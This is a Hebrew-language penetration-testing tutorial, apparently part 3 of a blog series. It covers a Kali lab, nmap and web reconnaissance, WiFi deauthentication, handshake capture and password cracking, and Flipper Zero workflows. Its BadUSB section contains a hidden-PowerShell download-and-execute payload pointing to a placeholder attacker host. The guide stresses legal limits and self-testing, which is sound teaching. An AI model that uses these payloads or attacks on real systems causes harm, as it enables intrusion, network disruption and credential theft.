מסלול ההאקר: סדרה בת 5 חלקים
חלק 1: מבוא → חלק 2: שליטה ב-Flipper → חלק 3: יסודות Kali → חלק 4: ניצול → חלק 5: הביקורת המלאה
בחלקים 1 ו-2, שכפלתם כרטיסים, ניתחתם תדרי רדיו והבנתם למה רוב ה"אבטחה" היא תיאטרון. ראיתם פגיעויות מבחוץ. עכשיו אתם נכנסים פנימה ורואים אותן מנקודת המבט של התוקף.
Kali Linux היא הפצת בדיקות החדירה הסטנדרטית בתעשייה. היא מגיעה עם יותר מ-600 כלי אבטחה מותקנים מראש. זה יכול להרגיש מכריע. רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות.
אנחנו עושים את זה אחרת. עד סוף המאמר הזה, יהיה לכם מעבדה עובדת, תבינו סיור רשת ברמה בסיסית, ותלכדו את לחיצת היד ה-WiFi הראשונה שלכם. כל שלב בנוי על הקודם.
חלק 1: בניית המעבדה שלכם
בודקי חדירה מקצועיים לא מריצים Kali על המחשב הראשי שלהם. הם משתמשים בסביבות מבודדות שאפשר לאפס, לצלם snapshots ולהרוס בלי להשפיע על המערכת הראשית. תעשו אותו דבר.
אפשרות א: מכונה וירטואלית (מומלץ ללמידה)
מכונה וירטואלית נותנת לכם את סביבת הלמידה הבטוחה ביותר. אתם יכולים לצלם snapshots של ההתקדמות, לעשות טעויות ולחזור אחורה מיד.
מה תצטרכו
- מחשב מארח: 16GB+ RAM, 50GB+ מקום פנוי בדיסק, מעבד מודרני עם תמיכה ב-virtualization
- תוכנת וירטואליזציה: VirtualBox (חינם) או VMware Workstation Player (חינם לשימוש אישי)
- Kali Linux: VM רשמי מוכן מראש מ-kali.org
פרויקט: הגדרת Kali VM
זמן: 30-45 דקות
שלבים:
- הורידו את תמונת ה-Kali VM עבור ה-hypervisor שלכם (VirtualBox או VMware)
- חלצו את הארכיון שהורדתם (7-Zip מומלץ ל-Windows)
- ייבאו את ה-VM ל-hypervisor שלכם
- הגדירו משאבים: מינימום 4GB RAM (מומלץ 8GB), 2+ ליבות מעבד
- הפעילו את מתאם הרשת במצב "Bridged" לגישה מלאה לרשת
- אתחלו את ה-VM והתחברו עם פרטי ברירת המחדל:
kali/kali - פתחו טרמינל והריצו:
sudo apt update && sudo apt full-upgrade -y - צרו snapshot בשם "Fresh Install" לשחזור קל
אימות הצלחה: אתם יכולים לפתוח טרמינל, להריץ whoami ולראות kali.
אפשרות ב: חומרה ייעודית (לתרגול רציני)
ברגע שאתם מרגישים נוח עם Kali, חומרה ייעודית מסירה את תקורת ה-VM ומאפשרת גישה מלאה לחומרה, מה שחיוני לבדיקות אלחוטיות.
המלצות חומרה
| אפשרות חסכונית | ThinkPad X230/T430 משומש ($100-150), WiFi של Intel מוחלף ב-Atheros AR9285 |
|---|---|
| אפשרות מודרנית | Framework Laptop עם מודול WiFi תואם Linux |
| חיישן ייעודי | Raspberry Pi 5 4GB עם מתאם Alfa AWUS036ACH חיצוני |
לעת עתה, VM מושלם. חומרה ייעודית הופכת חשובה כשאתם צריכים monitor mode לבדיקות אלחוטיות (מכוסה בהמשך המאמר).
אפשרות ג: Live USB (אפס שמירה)
Live USB מריץ Kali ישירות בלי התקנה. הכל נעלם כשמכבים. שימושי לבדיקות על חומרה שונה, אבל תאבדו את העבודה בכל הפעלה אלא אם תיצרו מחיצה persistent.
bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcherdd משמיד נתונים
הפקודה dd כותבת ישירות לדיסק בלי אישור. בדקו שלוש פעמים את שם ההתקן. כתיבה להתקן הלא נכון תמחק את כל הכונן לחלוטין.
חלק 2: החשיבה של הטרמינל
לפני שנוגעים בכלי אבטחה, צריך שתרגישו בנוח בטרמינל. זה לא אופציונלי. ה-GUI קיים ב-Kali, אבל העבודה האמיתית קורית בשורת הפקודה.
ניווט בסיסי
bash# Know where you are
pwd # Print working directory
# Move around
cd /home/kali # Go to home directory
cd .. # Go up one level
cd - # Go to previous directory
# See what's here
ls # List files
ls -la # List all files with details
ls -lah # Human-readable sizes
# Read files
cat filename # Display entire file
less filename # Scrollable view (q to quit)
head -n 20 filename # First 20 lines
tail -f filename # Follow file in real-time (logs)הסלמת הרשאות
כלי אבטחה רבים דורשים גישת root. ב-Kali, sudo נותן לכם הרשאות root זמניות.
bashsudo command # Run single command as root
sudo -i # Start root shell (be careful)
whoami # Check current user
id # Show user and group IDsRoot באחריות
הרצה כ-root משמעה אפס רשתות ביטחון. שגיאת הקלדה כמו rm -rf / תשמיד הכל. Kali מודרני מונע את הפקודה הספציפית הזו, אבל העיקרון עומד: תבינו מה אתם מריצים לפני שאתם מריצים את זה.
ניהול תהליכים
bashps aux # All running processes
top # Real-time process viewer
htop # Better process viewer (install if needed)
# Control processes
ctrl+c # Stop current process
ctrl+z # Suspend process
bg # Resume in background
fg # Bring to foreground
# Kill processes
kill PID # Graceful termination
kill -9 PID # Force kill (last resort)פקודות רשת
baship a # Show network interfaces
ip route # Show routing table
ping -c 4 8.8.8.8 # Test connectivity
curl ifconfig.me # Your public IP
# DNS lookups
nslookup google.com
dig google.comפרויקט: התמצאות בטרמינל
זמן: 15 דקות
משימות:
- מצאו את כתובת ה-IP שלכם ברשת המקומית באמצעות
ip a - זהו את ברירת המחדל של ה-gateway באמצעות
ip route - עשו ping ל-gateway שלכם כדי לאשר קישוריות
- הציגו את כל הקבצים ב-
/etcממוינים לפי זמן שינוי:ls -lt /etc | head - קראו את 50 השורות הראשונות של
/etc/passwd:head -n 50 /etc/passwd
מטרה: אתם צריכים להיות מסוגלים לנווט, לבדוק סטטוס רשת ולקרוא קבצים בלי לחשוב.
חלק 3: סיור רשת עם Nmap
Nmap (Network Mapper) הוא הכלי החשוב ביותר שתלמדו. הוא מגלה hosts, מזהה שירותים, מאתר מערכות הפעלה וממפה טופולוגיית רשת. כל השאר בנוי על הפלט של nmap.
הסריקה הראשונה שלכם
בואו נסרוק את הרשת שלכם. קודם, זהו את טווח הרשת:
bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24
# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnetתראו פלט כזה:
textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)הסריקה הראשונה הזו אומרת לכם: "ההתקנים האלה קיימים ברשת שלי." עכשיו בואו נשאל שאלות עמוקות יותר.
זיהוי שירותים
ברגע שאתם יודעים אילו hosts קיימים, אתם רוצים לדעת אילו שירותים הם מריצים.
bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)פלט נפוץ:
textPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0זיהוי מערכת הפעלה
bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1
# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1הבנת מצבי פורטים
Nmap מדווח על פורטים במספר מצבים:
- open - אפליקציה מקבלת חיבורים באופן פעיל. זה מה שתוקפים מחפשים.
- closed - הפורט נגיש אבל אין אפליקציה שמאזינה. ה-host פעיל אבל שם אין כלום.
- filtered - חומת אש או פילטר חוסם את הבדיקה. אי אפשר לקבוע אם פתוח או סגור.
- unfiltered - הפורט נגיש אבל nmap לא יכול לקבוע אם הוא פתוח או סגור.
סוגי סריקה והתגנבות
bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target
# SYN scan (stealthier, default with root)
sudo nmap -sS target
# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target
# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target
# Scan specific ports
sudo nmap -p 22,80,443,8080 target
# Top 1000 common ports (default behavior)
sudo nmap targetNmap Scripting Engine (NSE)
ה-NSE מרחיב את nmap עם סקריפטים מתמחים לזיהוי פגיעויות, מנייה של שירותים ועוד.
bash# Run default safe scripts
sudo nmap -sC target
# Check for vulnerabilities
sudo nmap --script vuln target
# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target
# HTTP enumeration
sudo nmap --script http-enum target
# List available scripts
ls /usr/share/nmap/scripts/ | head -20פרויקט: מפו את הרשת שלכם
זמן: 30 דקות
דרישות מקדימות: הכירו את טווח הרשת שלכם מ-ip a
- גלו את כל ה-hosts:
sudo nmap -sn YOUR_NETWORK/24 - רשמו את ה-hosts שהתגלו ואת כתובות ה-MAC שלהם
- בחרו את הראוטר שלכם (בדרך כלל .1) והריצו:
sudo nmap -sV -sC YOUR_ROUTER - זהו את כל הפורטים הפתוחים והשירותים בראוטר שלכם
- הריצו
sudo nmap -A YOUR_COMPUTERכדי לראות מה המחשב שלכם חושף
תיעוד: צרו קובץ טקסט שמפרט כל התקן, כתובת IP שלו, MAC והשירותים. זהו מפת הרשת שלכם.
סרקו רק רשתות שבבעלותכם
סריקת רשתות ללא הרשאה היא לא חוקית ברוב תחומי השיפוט. אפילו סריקת nmap פשוטה יכולה להיחשב כגישה לא מורשית. הישארו ברשת שלכם, בציוד שלכם וברשתות שבהן יש לכם אישור כתוב מפורש.
חלק 4: סיור אינטרנט
סריקת ה-nmap שלכם כנראה מצאה שירותי HTTP (פורטים 80, 443, 8080). בואו נבין מה רץ שם.
Whatweb: זיהוי שירות מהיר
bash# Identify web technologies
whatweb http://192.168.1.1דוגמת פלט:
texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]Nikto: סורק פגיעויות אינטרנט
bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1
# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentialsמנייה של תיקיות: מה מוסתר?
שרתי אינטרנט לעתים קרובות מכילים תיקיות שלא מקושרות מהעמוד הראשי: פאנלי ניהול, קבצי הגדרות, קבצי גיבוי.
bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtממצאים נפוצים:
text/admin (Status: 301)
/backup (Status: 403)
/config (Status: 200)
/login (Status: 200)מיקום Wordlists
Kali כולל wordlists מקיפות ב-/usr/share/wordlists/. התיקיות הנפוצות ביותר: dirb/, dirbuster/, rockyou.txt (סיסמאות), ו-seclists/ (אוסף מקיף).
פרויקט: בדקו את ממשק האינטרנט של הראוטר
זמן: 20 דקות
- הריצו
whatweb http://YOUR_ROUTER_IPכדי לזהות את השרת - הריצו
nikto -h http://YOUR_ROUTER_IPכדי לבדוק פגיעויות - הריצו
gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt - בקרו בתיקיות שהתגלו בדפדפן
- רשמו פאנלי ניהול, מספרי גרסאות או ממצאים מעניינים
ממצא נפוץ: עמודי ניהול ראוטר חשופים עם credentials ברירת מחדל.
חלק 5: סיור אלחוטי
כאן הדברים נהיים מעניינים. רשתות WiFi משדרות כל הזמן, ועם הכלים הנכונים, אתם יכולים ללכוד לחיצות יד אימות: ההחלפה המוצפנת שקורית כשהתקן מתחבר.
דרישות חומרה
ה-WiFi המובנה שלכם כנראה לא יעבוד לזה. אתם צריכים מתאם שתומך ב-monitor mode וב-packet injection. מומלץ: Alfa AWUS036ACH ($50) או Alfa AWUS036ACM ($45). אלה עובדים מהקופסה עם Kali.
הבנת Monitor Mode
מצב WiFi רגיל ("managed mode") מקבל רק חבילות שמיועדות להתקן שלכם. Monitor mode לוכד את כל החבילות בטווח, התעבורה של כל התקן בערוץ.
bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0monסריקה לרשתות
bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon
# You'll see:
# BSSID = Router MAC address
# PWR = Signal strength (higher = closer)
# CH = Channel
# ENC = Encryption (WPA2, WPA3, OPN)
# ESSID = Network name
# Press Ctrl+C to stopמה שאתם רואים הוא כל רשת WiFi בטווח, הגדרות האבטחה שלהן, ולעתים קרובות ההתקנים המחוברים אליהן. זה מה ש-war driver רואה כשהוא סורק שכונות.
לכידת Handshake
כשהתקן מתחבר לרשת WPA2, יש four-way handshake. אם תלכדו את ה-handshake הזה, תוכלו לנסות לפצח את הסיסמה offline.
bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"
# Now wait for a device to connect...
# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshakeכשתלכדו handshake, airodump-ng מציג [ WPA handshake: XX:XX:XX:XX:XX:XX ] בפינה הימנית העליונה.
התקפות Deauth הן לא חוקיות
שליחת חבילות deauthentication לרשתות שאינן בבעלותכם היא עבירה פדרלית על פי ה-Computer Fraud and Abuse Act (בארה"ב) וחוקים דומים במקומות אחרים. בדקו רק ברשת שלכם. המטרה היא להבין את הפגיעות, לא לתקוף אחרים.
פיצוח ה-Handshake
עם handshake שנלכד, אתם יכולים לנסות לפצח את הסיסמה offline באמצעות wordlist:
bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]
# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx
# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtבדיקת מציאות חוזק סיסמאות
rockyou.txt מכיל 14+ מיליון סיסמאות מפריצות נתונים אמיתיות. אם סיסמת ה-WiFi שלכם היא "password123" או "summer2024" או שם הכלב שלכם, אפשר לפצח אותה בשניות. סיסמה אקראית של 12+ תווים תיקח מיליוני שנים ל-brute-force.
פרויקט: בדקו את אבטחת ה-WiFi שלכם
זמן: 45 דקות
דרישות מקדימות: מתאם WiFi חיצוני עם תמיכה ב-monitor mode
- הפעילו monitor mode:
sudo airmon-ng start wlan0 - סרקו רשתות:
sudo airodump-ng wlan0mon - רשמו את הערוץ וה-BSSID של הרשת שלכם
- לכדו בערוץ שלכם:
sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon - חברו מחדש התקן ל-WiFi שלכם (או השתמשו ב-deauth ברשת שלכם בלבד)
- אשרו לכידת handshake
- בדקו מול rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap
תוצאה: אם הסיסמה שלכם נמצאה, שנו אותה מיד למשהו אקראי וארוך (20+ תווים).
חלק 6: חיבור ה-Flipper Zero שלכם
זוכרים את כל הלכידות מחלק 2? בואו נשלב אותן בזרימת העבודה שלכם עם Kali.
העברת קבצים
bash# Connect Flipper via USB
# It appears as a mass storage device
# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper
# Your captures are in:
/mnt/flipper/subghz/ # Sub-GHz captures
/mnt/flipper/nfc/ # NFC dumps
/mnt/flipper/infrared/ # IR captures
/mnt/flipper/lfrfid/ # 125kHz RFID
/mnt/flipper/badusb/ # BadUSB scriptsניתוח NFC Dumps
bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk
# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd
# Analyze MIFARE Classic dump
hexdump -C card.mfd | lessניתוח Sub-GHz
bash# Flipper's .sub files are text-based
cat garage_door.sub
# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information
# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)פיתוח BadUSB
צרו payloads של BadUSB ב-Kali, בדקו אותם ב-Flipper:
bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF
# Host the payload from Kali:
python3 -m http.server 8000
# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/Payloads של BadUSB הם עוצמתיים
הסקריפטים האלה מתבצעים אוטומטית כשמחברים אותם. payload זדוני יכול להתקין backdoors, לגנוב credentials או להשמיד נתונים בשניות. השתמשו רק במכונות שלכם לבדיקות. לעולם אל תשאירו את ה-Flipper שלכם במקום שמישהו אחר עלול לחבר אותו.
חלק 7: תיעוד וזרימת עבודה
בודקי חדירה מקצועיים לא רק מריצים כלים. הם מתעדים הכל. תיעוד טוב מפריד בין חובבנים למקצוענים.
רישום הערות עם CherryTree
bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree
# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitationשמירת פלט Nmap
bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target
# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml (parseable)
# scan_results.gnmap (greppable)רישום הפעלה
bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log
# Now every command and output is recorded
# Type 'exit' to stop loggingמסלול ההאקר
סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.
חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali ✓ חלק 4: ניצול חלק 5: ביקורת מלאה
רשימת בדיקה לחלק 3
☐ הגדרת מעבדה: Kali VM רץ, מעודכן, snapshot נשמר
☐ טרמינל: נוח עם ניווט, הרשאות, שליטה בתהליכים
☐ Nmap: רשת ממופה, שירותים מזוהים, ראוטר נסרק
☐ סיור אינטרנט: ממשק אינטרנט של ראוטר נותח עם whatweb/nikto
☐ אלחוטי: Monitor mode מופעל, רשתות נסרקו
☐ Handshake: WiFi handshake של עצמכם נלכד ונבדק
☐ Flipper: קבצים הועברו, זרימת עבודה מובנת
☐ תיעוד: הערות מאורגנות, סריקות נשמרו
מה הלאה
בניתם את המעבדה שלכם ולמדתם את שלב הסיור. אתם יכולים לגלות hosts, לזהות שירותים וללכוד handshakes אלחוטיים. אתם מבינים מה תוקפים רואים כשהם מסתכלים על רשת.
בחלק 4, עוברים מסיור לניצול. תלמדו:
- Metasploit Framework, האולר השוויצרי של הניצול
- זרימות עבודה נפוצות לניצול פגיעויות
- טכניקות post-exploitation: מה קורה אחרי הגישה הראשונית
- הסלמת הרשאות: מעבר ממשתמש רגיל למנהל
- Pivoting: שימוש במערכת שנפרצה כדי לתקוף אחרות
הסיור אומר לכם איפה הדלתות. הניצול מלמד אתכם איך לעבור דרכן.
מיפיתם את השטח. עכשיו אתם לומדים לנווט בו. חלק 4 לוקח אתכם מצופה למפעיל.
נתראה בחלק 4.